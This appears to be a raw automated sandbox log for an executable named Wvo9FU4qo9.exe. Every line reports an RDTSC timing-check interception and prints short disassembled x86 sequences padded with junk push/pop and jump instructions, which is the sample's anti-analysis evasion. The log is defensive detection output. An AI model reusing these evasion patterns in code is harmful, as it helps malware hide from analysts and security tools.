                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C15AD second address: 6C15E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F3331238826h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jnp 00007F3331238830h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3331238822h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 69F5E9 second address: 69F5ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6ECED9 second address: 6ECEEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333123881Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6ECEEC second address: 6ECF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F333124C808h 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F333124C7E0h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6ECF0C second address: 6ECF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6ED79A second address: 6ED7A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6ED7A0 second address: 6ED7A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6ED7A6 second address: 6ED7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6ED956 second address: 6ED95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6ED95A second address: 6ED95E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6ED95E second address: 6ED964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 66D283 second address: 66D289 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 66D289 second address: 66D28F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 66D28F second address: 66D2BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F333124C7DFh 0x00000008 jmp 00007F333124C7E6h 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F79AB second address: 6F79B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3331238816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F79B5 second address: 6F79BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F79BB second address: 6F79C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F3331238816h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F79C9 second address: 6F79D5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F333124C7D6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F79D5 second address: 6F79E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F3331238816h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F641B second address: 6F641F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F6564 second address: 6F656A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F656A second address: 6F6576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F333124C7D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F6576 second address: 6F6590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3331238823h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F671D second address: 6F6781 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F333124C7D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jo 00007F333124C7DAh 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 jmp 00007F333124C7E5h 0x00000025 pushad 0x00000026 jl 00007F333124C7D6h 0x0000002c jnp 00007F333124C7D6h 0x00000032 jmp 00007F333124C7DDh 0x00000037 popad 0x00000038 jmp 00007F333124C7DFh 0x0000003d push ecx 0x0000003e push eax 0x0000003f pop eax 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F68C6 second address: 6F6936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F333123881Ch 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007F3331238824h 0x00000010 jmp 00007F333123881Ch 0x00000015 pop edx 0x00000016 pop esi 0x00000017 pushad 0x00000018 jmp 00007F3331238822h 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F3331238821h 0x00000025 js 00007F3331238816h 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F333123881Ch 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F6936 second address: 6F6950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F333124C7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F333124C7D6h 0x00000014 ja 00007F333124C7D6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F6950 second address: 6F6954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F6D48 second address: 6F6D66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F333124C7E7h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F7132 second address: 6F713E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F73E9 second address: 6F73F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F333124C7D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F73F3 second address: 6F73F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F7834 second address: 6F7838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F60F4 second address: 6F6120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 jmp 00007F333123881Eh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F3331238821h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6F6120 second address: 6F6124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6FEE4C second address: 6FEE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6FEE51 second address: 6FEE64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6FEE64 second address: 6FEE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6FDBB8 second address: 6FDBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6FDBBE second address: 6FDBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6FDD05 second address: 6FDD0A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6FDD0A second address: 6FDD29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3331238826h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6FE594 second address: 6FE5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F333124C7E2h 0x0000000a jmp 00007F333124C7DCh 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6FE897 second address: 6FE8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F333123881Ch 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3331238822h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 701420 second address: 701424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 701424 second address: 70142A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 700F6C second address: 700F74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 700F74 second address: 700F7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 700F7A second address: 700F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F333124C7E9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 700F97 second address: 700F9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7040DB second address: 7040E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7040E2 second address: 7040E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 708BD5 second address: 708BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 708BDB second address: 708C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnl 00007F333123882Ch 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 708C01 second address: 708C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F333124C7E5h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 70EBD6 second address: 70EBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3331238828h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 70D726 second address: 70D72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 70D72C second address: 70D759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3331238827h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007F3331238816h 0x00000014 jg 00007F3331238816h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 70D759 second address: 70D75F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C1064 second address: 6C106A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C106A second address: 6C1093 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F333124C7E8h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F333124C7DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C1093 second address: 6C1097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C1097 second address: 6C10CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor dword ptr [ebp+1247CEFAh], ecx 0x0000000f mov ebx, dword ptr [ebp+1248B09Bh] 0x00000015 add eax, ebx 0x00000017 stc 0x00000018 nop 0x00000019 jmp 00007F333124C7E9h 0x0000001e push eax 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C10CF second address: 6C116A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 or dword ptr [ebp+122D24AEh], edi 0x0000000e mov dword ptr [ebp+12465031h], ebx 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F3331238818h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 pushad 0x00000031 je 00007F333123881Ch 0x00000037 mov dword ptr [ebp+12455FB4h], edi 0x0000003d mov esi, dword ptr [ebp+122D3682h] 0x00000043 popad 0x00000044 mov dword ptr [ebp+122D20C0h], eax 0x0000004a nop 0x0000004b pushad 0x0000004c jmp 00007F333123881Ch 0x00000051 pushad 0x00000052 jmp 00007F333123881Bh 0x00000057 jmp 00007F3331238824h 0x0000005c popad 0x0000005d popad 0x0000005e push eax 0x0000005f pushad 0x00000060 jmp 00007F3331238820h 0x00000065 push eax 0x00000066 push edx 0x00000067 push ebx 0x00000068 pop ebx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 70DE91 second address: 70DEA5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F333124C7D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F333124C7D6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 70DEA5 second address: 70DEBA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3331238816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jl 00007F3331238822h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 70DEBA second address: 70DEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F333124C7D6h 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 70E8B4 second address: 70E8CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333123881Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007F3331238816h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 70E8CD second address: 70E8DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jo 00007F333124C7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7120B5 second address: 7120BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7120BB second address: 7120D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7E7h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 712263 second address: 712267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7123C3 second address: 7123C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71267A second address: 71267F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71267F second address: 71268B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F333124C7D6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 714045 second address: 714049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 714049 second address: 71404F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71404F second address: 714055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 714055 second address: 714059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 714059 second address: 71407D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3331238816h 0x00000008 jmp 00007F3331238827h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71407D second address: 714085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71B78A second address: 71B7C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F3331238816h 0x00000009 pop ecx 0x0000000a jo 00007F333123881Eh 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007F3331238816h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b jmp 00007F3331238828h 0x00000020 pushad 0x00000021 jnl 00007F3331238816h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 719817 second address: 719837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F333124C7E2h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 719837 second address: 719841 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3331238816h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 7199E3 second address: 7199EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71A379 second address: 71A383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3331238816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71A383 second address: 71A387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71ABBA second address: 71ABD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F3331238816h 0x0000000c popad 0x0000000d jng 00007F333123881Ch 0x00000013 jp 00007F3331238816h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71ABD7 second address: 71ABDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 71ABDB second address: 71ABF6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3331238816h 0x00000008 jmp 00007F333123881Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
